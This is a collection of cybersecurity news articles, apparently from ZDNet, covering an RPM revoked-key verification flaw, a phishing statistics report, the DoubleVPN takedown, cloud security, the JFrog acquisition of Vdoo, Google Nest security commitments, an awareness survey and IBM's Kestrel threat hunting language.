Information Technology

In 1995, when Linux 1.x was the hot new Linux kernel, early Red Hat founding programmers Marc Ewing and Erik Troan created RPM. This software package management system became the default way to distribute software for Red Hat Linux-based distributions such as Red Hat Enterprise Linux (RHEL), CentOS Stream, AlmaLinux OS, and Rocky Linux. Unfortunately, hidden within its heart is a major security hole. 

Dmitry Antipov, a Linux developer at CloudLinux, AlmaLinux OS’s parent company, first spotted the problem in March 2021. Antipov found that RPM would work with unauthorized RPM packages. This meant that unsigned packages or packages signed with revoked keys could silently be patched or updated without a word of warning that they might not be kosher. Why? Because RPM had never properly checked revoked certificate key handling. Specifically, as Linux and lead RPM developer Panu Matilainen explained: “Revocation is one of the many unimplemented things in rpm’s OpenPGP support. In other words, you’re not seeing a bug as such; it’s just not implemented at all, much like expiration is not.” How could this be? It’s because RPM dates back from the days when getting code to work was the first priority and security came a long way second. For example, we don’t know whether the first RPM commit was made by Marc Ewing or Erik Troan because it was done as root. Those were the days! Things have changed. Security is a much higher priority.  Antipov, wearing his hat as a TuxCare (CloudLinux’s KernelCare and Extended Lifecycle Support) team member, has submitted a patch to fix this problem. As Antipov explained in an interview: “The problem is that both RPM and DNF, [a popular software package manager that installs, updates, and removes packages on RPM-based Linux distributions]  do a check to see if the key is valid and genuine but not expired, but not for revocation. As I understand it, all the distribution vendors have just been lucky enough to never have been hit by this.” They have indeed been lucky. Armed with an out-of-date key, it could be child’s play to sneak malware into a Linux desktop or server. 

Joao Correia, a TuxCare Technical Evangelist, asked: “Do you know how long it takes for the distros to pick up the changes that are submitted to the code repositories?” Antipov replied: That’s hard to know. In general, the problem is that crypto is hard. It takes a special background, some special experience, and so on. Package management projects are doing package management, not crypto, so they don’t want, and don’t need to, develop their own crypto libraries to include RPM and DNF. I’m not an expert in the crypto field to be able to fix current DNF and RPM issues. I’ve used the RNP library, a well-known library in the open-source world, already used in Mozilla Thunderbird, for example, but the library itself is not a part of Red Hat or any other RPM-based Linux distribution. So to take my fix as is, for the moment, they need to add it to the library first. This is not so quick, so it’s hard to say how long it will take. He fears though it may be months before the fix is released. At the moment, the security hole is still alive, well, and open for attack. Antipov and his team are considering opening a Common Vulnerabilities and Exposures (CVE) about the issue since, in the end, it’s clearly a security issue.  If I may be so bold: File a CVE with Red Hat. This needs fixing, and it needs fixing now. In the meantime, administrators of RPM-based systems will need to take a closer look at the patch programs to make sure they are legitimate patches. Related Stories: More

A new report from cybersecurity firm Avanan found that their customers in the IT, healthcare and manufacturing industries were facing the highest number of phishing emails. The company’s researchers examined more than 905 million emails for the 1H 2021 Global Phish Cyber Attack Report, finding that the IT industry specifically saw 9,000 phishing emails in a one month span out of almost 400,000 total emails. Their healthcare industry customers saw more than 6,000 phishing emails in one month out of an average of over 450,000 emails and manufacturing saw a bit less than 6,000 phishing emails out of about 330,000 total emails. 

ZDNet Recommends

Avanan researchers said these industries are ripe targets because of the massive amount of personal data they collect and because they are often stocked with outdated technology that can be easily attacked. Gil Friedrich, CEO of Avanan, said the report highlighted the perilous situation facing thousands of hospitals around the world. “The Avanan research shows that hackers are using one of the most basic tactics to get in ‒- phishing attacks,” Friedrich said.About 5% of all emails are phishing, according to the report, and many hackers are now attempting to target “low-hanging fruit” as opposed to more important C-level executive accounts. Most phishing attacks involve either impersonation or credential harvesting, the researchers found. More than half of all phishing attacks involve credential harvesting and that figure has grown by almost 15% since 2019. About 20% of all phishing attacks are related to Business Email Compromise. 

Non-executive accounts are targeted 77% more than other accounts, the report said, and nearly 52% of all impersonation emails are pretending to be from a non-executive account at an enterprise. “There are a few reasons behind this. One, security admins might be spending a lot of time providing extra attention to the C-Suite and hackers have adjusted. Two, non-executives still hold sensitive information and have access to financial data. There is no need to go all the way up the food chain,” Avanan researchers said. Avanan works as a second layer of defense behind Microsoft’s EOP, ATP/Defender, Google Workspace and other tools. The report said more than 8% of all phishing emails managed to get past the first layers of defense and into people’s inboxes “because of an allow or block list misconfiguration, a 5% increase from last year, and 15.4% of email attacks are on an Allow List.””The most commonly used tactic is using non-standard characters and limited sender reputation. Non-standard characters are used in 50.6% of phishing links and 84.3% of phishing emails do not have a significant historical reputation with the victim,” the report said. Avanan researchers also noted the Junk Email folder in many inboxes has become a haven for phishing emails, confusing many users who look through their Junk folders for marketing emails and subscriptions. The report said SCL scores of 5,6, and 9 will be sent to a Microsoft user’s Junk folder, leaving them alongside more legitimate emails offering deals and other things. “You now have monthly subscriptions, newsletters, and targeted phishing attacks in your spam folder, and you have to leave it up to the end-user to decide which ones are safe to open,” one unnamed CIO told Avanan researchers. The same happens for Google users but Microsoft users see 89% more emails in Junk than Google does, according to the report. “An easy way to determine if an email is suspicious is by looking at sender reputation. It’s no wonder, then, that 84.3% of all phishing emails do not have a significant historical reputation with the victim. Further, 43.35% of all phishing emails come from domains with very low traffic,” the report said.  More

An underground virtual private network (VPN) service used by cyber criminals to hide their activities while conducting ransomware attacks, phishing campaigns and other malicious hacking operations has been taken down in a major international law enforcement operation. DoubleVPN offered users the ability to mask their locations and identities, allowing cyber criminals to carry out activities anonymously, according to police.

ZDNet Recommends

Now its servers and web domains have been seized by a coordinated law enforcement takedown led by the the Dutch National Police (Politie) and involving agencies including Europol’s European Cybercrime Centre (EC3), Eurojust, the FBI, and the UK National Crime Agency. SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)    DoubleVPN was heavily advertised across Russian and English-speaking dark web cybercrime forums as means for criminals, including ransomware gangs and phishing operations, to hide their activities, according to Europol. The cheapest VPN connection on offer cost just $25, while more expensive services offered what’s described as double, triple and even quadruple VPN connections to criminal clients. Servers hosting DoubleVPN around the world have been seized and web domains relating to the service have been replaced with a takedown notice, reading: “On 29th of June 2021, law enforcement took down DoubleVPN. Law enforcement gained access to the servers of DoubleVPN and seized personal information, logs and statistics kept by DoubleVPN about all of its customers. Double VPN’s owners failed to provide the services they promised.” Dutch public prosecutor Wieteke Koorn said: “This criminal investigation concerns perpetrators who think they can remain anonymous, while facilitating large-scale cybercrime operations.

“By taking legal action, including the special investigatory power for digital intrusion, we want to make it very clear there cannot be any safe havens for these kind of criminals. Their criminal acts damage the digitalised society and erode the trust of citizens and companies in digital technologies, therefore their behaviour has to be stopped,” she added. The joint operation involved more than 30 coordination meetings and four workshops to prepare for the final stage of the takedown that was organised on the day the via virtual command post was set up by Europol. SEE: Ransomware: Paying up won’t stop you from getting hit again, says cybersecurity chief “Law enforcement is most effective when working together and today’s announcement sends a strong message to the criminals using such services: the golden age of criminal VPNs is over. Together with our international partners, we are committed to getting this message across loud and clear,” said Edvardas Šileris, head of Europol’s EC3. Law enforcement services from Germany, Canada, Sweden, Italy, Bulgaria and Switzerland also participated in the takedown, which was was carried out following the the framework of the European Multidisciplinary Platform Against Criminal Threats (EMPACT).

MORE ON CYBERSECURITY More

Every business, large of small, is a target of cybercriminals and should look at minimising security risks, not simply preventing them. This is essential as more businesses move to the cloud and organisations in Asia largely still lack an urgency in addressing security. Unlike their peers in the US, where enterprises across most sectors considered security as part of their business process, Asia-Pacific companies had yet to do so, said Paul Hadjy, CEO and co-founder of Horangi. The Singapore-based security startup’s flagship product, Warden, is a cloud security posture management software touted to safeguard against misconfigurations and compliance breaches. Likely distracted by having to keep the business running and day-to-day management, Hadjy noted that Asia-Pacific organisations generally did not regard security as topmost on their agenda when it would be commonly discussed at every meeting in the boardroom and amongst C-level executives in the US. 

This was changing, though, he said, adding that focus on security would intensify as more regulations were introduced around the use of cloud and businesses would be concerned about staying in compliance.And they would reasons to be anxious. By 2023, at least 99% of cloud security failures were projected to be the customer’s fault, according to Gartner. The research firm also predicted that half of enterprises this year would unknowingly and erroneously expose some cloud services or applications to the public internet, including storage, APIs (application programming interfaces), and network segments. Hadjy noted that most customers Horangi worked with had no prior cloud security framework in place. “If you’re not using a cloud security platform, you’re going to have issues because you don’t have visibility across the cloud architecture,” he said. “You can use tools to do so manually, but you’ll need to repeatedly follow [the steps] to do so when you use different cloud platforms.”He stressed the need for proper security and processes, such as patch management, to be in place to address any potential misconfigurations. 

He warned that no business today was too small to be a target and all were at risk of cybersecurity attacks. Hackers also would target organisations that did not take security seriously. Technology, too, was no different from any other business, with opportunities for mistakes to be made, he said, especially if there was no automation involved. IT environments also could become challenging to manage over time, with organisations challenged to manage systems and software that were more than a decade old alongside modern applications running on cloud.Hadjy added that the move to remote work further complicated IT infrastructures, where traditional methods of ring-fencing corporate networks were no longer effective as more employees worked from home. Noting that no security solution was perfect, he noted the need for organisations to focus on mitigating risks and their ability to react quickly to reduce their risks should they suffer a security breach. Founded in 2016, Horangi last month was added to Amazon Web Services’ (AWS) ISV Accelerate programme, having obtained the cloud vendor’s security competency status. The Singapore startup last year secured $20 million in Series B funding, adding to its Series A $3.1 million haul, and might embark on another fund-raising initiative this or next year, Hadjy told ZDNet.Horangi’s Warden is pitched as a multi-cloud security platform designed to automatically safeguard against misconfigurations and compliance violations. It identifies “critical cloud resource configurations that may become entry points for attackers”, according to the startup. RELATED COVERAGE More

DevOps platform maker JFrog, the first company to develop a binary code management repository for developers, said June 29 that it is acquiring Tel Aviv-based Vdoo in a cash- and stock-based deal valued at about $300 million. Vdoo makes an integrated security platform for connected, IoT, and embedded devices.

see also

Best VPN services

Virtual private networks are essential to staying safe online, especially for remote workers and businesses. Here are your top choices in VPN service providers and how to get set up fast.

Read More

JFrog founder and CEO Shlomi Ben Haim told ZDNet that adding Vdoo’s intellectual property was important to his company’s efforts to develop a next-generation security offering to support DevOps users as they respond to a disruption in the market for continuous software delivery. Both companies focus on protecting binary code in enterprise IT systems, a central target for hackers, Ben Haim said.Sunnyvale, Calif.-based JFrog is expanding its end-to-end DevOps platform offering, which provides holistic security ranging from the development environment all the way to edge systems, IoT, and other devices. DevOps is a set of best practices that combines software development and IT operations, with its purpose to shorten a system’s development life cycle and provide continuous delivery with high software quality. Affiliated with DevOps is a relatively new segment called “liquid software,” which describes the flow of software packages from the moment they are created all the way to deployment. Whereas software companies years ago used to publish one or two updates per year, they now often produce updates and patches whenever they are needed–sometimes multiple times per day. Because of these developments, namely all this new software filling the internet traffic lanes every second, new security processes are required, Ben Haim said.Most current DevOps and liquid software solutions lack proper security capabilities that are fully integrated into the software lifecycle, Ben Haim said. These security tools are point products with their own data sets, which create friction between development and security teams and slow the release of software updates. This problem is especially acute when updates are continuously delivered to the edge or across a large fleet of devices. As a result, many of these security tools are not delivering on the promise of fast, automated, and secure releases, Ben Haim said.”The main motivation behind this is that we want to provide the world with a real DevSecOps solution, all the way from the DevOps pipeline, to the edge, to whatever destination,” Ben Haim said. “What we built during the past four years is technology–and better software security–around focusing on binary. We identify binary as the highest priority.”

Vdoo’s product security platform automates software security tasks throughout the entire product lifecycle, ensuring that all findings are prioritized, communicated, and mitigated. The company’s security experts and vulnerability researchers will join the JFrog team to develop advanced security solutions for developers and security engineers, CEO and co-founder Nati Davidi told ZDNet.JFrog said it will expand its JFrog Xray vulnerability detection product to include Vdoo’s data and improved scanning across multiple dimensions, including configuration and applicability scanning, by the end of this year. In addition, JFrog expects to fully integrate Vdoo’s technology into its DevOps platform to provide an all-in-one secured platform in 2022, Ben Haim said. More

Google is outlining new security standards for its Nest smart home devices and updating its privacy commitments as part of an effort to make its positions on both privacy and security more straightforward for Nest users. 

Google said its new Nest security practices include adopting standards Google has long held as well as implementing new updates that are specific to Nest’s connected home devices and services. Specifically, Google will begin certifying Nest devices sold in 2019 or later using an independent security standard, including those developed by the Internet of Secure Things Alliance (ioXt). The company will also publish the validation results that explain how its products hold up to those standards, and will assess new products against the standards prior to launch. Meanwhile, Google said Nest will now participate in the Google vulnerability rewards program, which pays outside security researchers for finding vulnerabilities and reporting them to the Nest Security team. Google has also committed to patching critical issues known to Google Nest, promising automatic bug and security fix support for a minimum of 5 years.Nest devices will also be added to the Google device activity page to give users visibility into which devices are connected to their account. It’s worth noting that Nest users have already had access to these security protections, providing they coupled their devices with an active Google account. In terms of privacy, Google said it has updated a section in its privacy commitments to better reflect its focus on openness. Nest product manager Ryan Campbell said in a blog post:Two years ago Nest shared our commitments to privacy to give you a better understanding of how our products work in your home. Today, we’re publishing new security commitments and putting it all in one place: Nest’s new Safety Center. The Safety Center is meant to give you a clear picture of the work we do each day to build trustworthy products and create a safer and more helpful home.Finally, we want to acknowledge the way this technology is evolving — for example, our recent announcements on Matter and our work on Project Connected Home over IP ). That’s why we’ve updated a small section in our privacy commitments to better reflect our focus on openness.

Google’s latest security updates to the Nest product family builds on changes made by Google to try and bolster the security posture of its products. In February 2020, Google rolled out two-factor authentication (2FA) to Nest devices, and prior to that, reCAPTCHA Enterprise was integrated with Nest accounts to mitigate the risk of credential stuffing attacks.RELATED: More

A new survey from cybersecurity company Armis found that awareness of major cybersecurity incidents in the US is lacking.Last month, the company surveyed more than 2,000 professionals, discovering that almost 25% had never heard about the ransomware attack on Colonial Pipeline that caused gas shortages along the East Coast. More than 23% said the attack would not have any longstanding effects on the fuel industry in the US, despite the highly-publicized cybersecurity changes oil and gas companies were forced to make by the Biden Administration following the attack. Nearly half of respondents had not heard about the malicious takeover of the water treatment plant in Oldsmar, Florida.More than half of all respondents said their devices did not pose a cybersecurity risk when it came to personal cybersecurity. Over 70% said they expected to bring their devices from home into the office once COVID-19 restrictions were lifted. Curtis Simpson, CISO at Armis, said the responses showed that organizations have to prioritize cybersecurity on their own because employees have little awareness of the cyber threat landscape. “The attacks on our critical infrastructure are clear evidence of the need for cybersecurity and assurance to all our utility providers and players. Organizations must be able to know what they have, track behavior, identify threats, and immediately take action to protect the safety and security of their operation,” Simpson said. 

“This data shows that there is less consumer attention on these attacks as we might expect, and so that responsibility falls to businesses to shore up their defenses.”A bipartisan group of US House of Representatives members introduced the American Cybersecurity Literacy Act last week in an effort to improve the country’s understanding of cybersecurity and kickstart public awareness campaigns. Rep. Adam Kinzinger, one of the leading voices behind the bill, noted on Twitter that a cyberattack occurs every 39 seconds and that since the pandemic started, cybercrime has increased drastically. “We must protect ourselves and our interests — and it starts with cyber education. As technological advancements increase and become more complex, it is critical that everyone is aware of the risks posed by cyberattacks and how to mitigate those risks for personal security,” Kinzinger said. “In order to prevent these attacks going forward, we must combine public awareness with targeted cyber education.”Rep. Gus Bilirakis, the Congressman for Oldsmar, Florida, added that the bill would help “develop a national education campaign to raise awareness of attacks and the practical steps that can be taken to thwart future bad actors.” “In my district, a hacker was recently able to penetrate a local government’s security measures and temporarily change the chemical settings of the city’s water supply to a potentially dangerous level,” Bilirakis said. “This is a matter of national security, and we must do everything we can to protect all Americans from those who wish to do us harm.”

more coverage More

IBM has contributed the Kestrel threat analysis language to the Open Cybersecurity Alliance (OCA). 

On Tuesday, the tech giant said that Kestrel helps Security Operations Center (SOC) analysts and other professionals in the industry “streamline threat discovery,” allowing experts to more quickly tackle cyberforensics investigations, breaches, and other incidents. Kestrel made its debut this year at the RSA Conference. The open source programming language, developed jointly between IBM Research and IBM Security, is based on experiments performed via DARPA’s Transparent Computing initiative. Kestrel is used to compose ‘hunt’ flows for threats, including known patterns, sources, analytics, and applying detection logic to create a process for cybersecurity professionals to leave repetitive jobs in the hands of automation and instead focus on other tasks which require the intuition and skill of human staff.  Normally, proactive threat hunting to protect an organization’s networks takes a lot of human hours and skill, but as it requires hypotheses and likely sources for attack to be created alongside detection procedures, the vendor believes that cybersecurity staff often end up “rewriting the same programs following each attack.” This is where Kestrel comes in. 
IBM
“Kestrel threat hunting language provides an abstraction for threat hunters to focus on what to hunt instead of how to hunt,” IBM says. “The composable hunting flows enable the reuse of best practices and help reduce the time to create new hunts.”

The project is open source, and now accepted by the OCA — of which members include Cybereason, McAfee, IBM Security, and Tenable — it is hoped that the language will further the alliance’s promotion of interoperable cybersecurity products.  “Instead of dissecting indicators of compromise we will be dissecting playbooks of entire hunt logic and across data sources,” commented Sheldon Shaw, VP of Innovation & Infrastructure at CyberNB. “As adoption of the language continues to roll out, our collective hunt teams will be able to collaborate and approach cyber investigations differently.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More